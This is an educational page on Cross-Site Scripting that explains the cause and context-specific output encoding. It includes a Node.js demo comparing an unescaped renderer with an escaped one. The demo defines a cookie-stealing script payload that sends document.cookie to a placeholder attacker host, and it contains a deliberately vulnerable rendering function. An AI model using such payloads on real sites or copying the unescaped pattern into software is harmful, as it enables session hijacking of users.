Cross-Site Scripting Resources

Status: Current   (as of 17 August 2006)

Cross-Site Scripting (commonly abbreviated as XSS) is a security issue that arises when an attacker can cause client-side script (such as JavaScript) of their choosing to execute within another user's browser in the context of a given web-site or web-application. Because the injected script runs with the same origin as the site itself, it may allow the attacker to steal that user's session cookies for the web-application in question, issue requests to the application as that user, or otherwise manipulate that user's session context.

XSS vulnerabilities most often arise when a web-application renders data that originated from an untrusted source (such as a query parameter, form field, or request header) in an HTML document without escaping it for the context in which it appears (element content, an attribute value, a JavaScript string, or a URL). Validating input is not sufficient on its own; the data must be encoded at the point where it is written into the page, using the encoder appropriate to that context.
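As an added illustration (not code from the original page), the following Node.js snippet shows the reflected query-parameter case described above: a page-rendering function that concatenates the parameter straight into HTML, next to the same function with HTML escaping applied at output. The parameter name `name`, the function names, and the attack payload are constructed for the example.

```javascript
// Added example, not part of the original page. Demonstrates reflected XSS via
// an unescaped query parameter and the output-escaping fix. The route, the
// `name` parameter and the payload below are constructed for illustration.

// Vulnerable: the attacker-controlled value is concatenated straight into HTML,
// so a value containing markup becomes part of the document.
function renderGreetingUnsafe(name) {
  return `<html><body><h1>Hello, ${name}!</h1></body></html>`;
}

// Escape the five characters that are significant in HTML element content and
// quoted attribute values. '&' must be handled first so the entities added by
// the later replacements are not themselves re-escaped. Other contexts
// (JavaScript strings, URLs, CSS) need their own encoders.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened: same template, but the untrusted value is escaped at the point it
// is written into the document, so the browser renders it as text.
function renderGreetingSafe(name) {
  return `<html><body><h1>Hello, ${htmlEscape(name)}!</h1></body></html>`;
}

// Pull the `name` query parameter out of a request URL, as a handler would.
// URLSearchParams percent-decodes the value, which is what the server sees.
function nameFromUrl(requestUrl) {
  const u = new URL(requestUrl, 'http://localhost');
  return u.searchParams.get('name') || 'guest';
}

// Crude indicator used only to show the difference between the two renderers:
// does the output contain a script element the attacker introduced?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker payload: if rendered raw, it would send the victim's
// cookies to a host the attacker controls (attacker.example is a placeholder).
const ATTACK_PAYLOAD =
  "<script>fetch('//attacker.example/?c='+document.cookie)</script>";

function main() {
  // The link an attacker would send to the victim.
  const url = '/greet?name=' + encodeURIComponent(ATTACK_PAYLOAD);
  const name = nameFromUrl(url);
  console.log('unsafe render contains script:', containsScriptTag(renderGreetingUnsafe(name)));
  console.log('safe render contains script:  ', containsScriptTag(renderGreetingSafe(name)));
  console.log(renderGreetingSafe(name));
}

main();
```

The escaping shown is correct only for HTML text and double- or single-quoted attribute values; if the same value were placed inside an inline `<script>` block, a URL, or an unquoted attribute, a different encoder would be required, which is why the fix is described as context-specific output encoding rather than a single sanitising filter.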

The following online resources provide further information on XSS vulnerabilities and how to avoid them: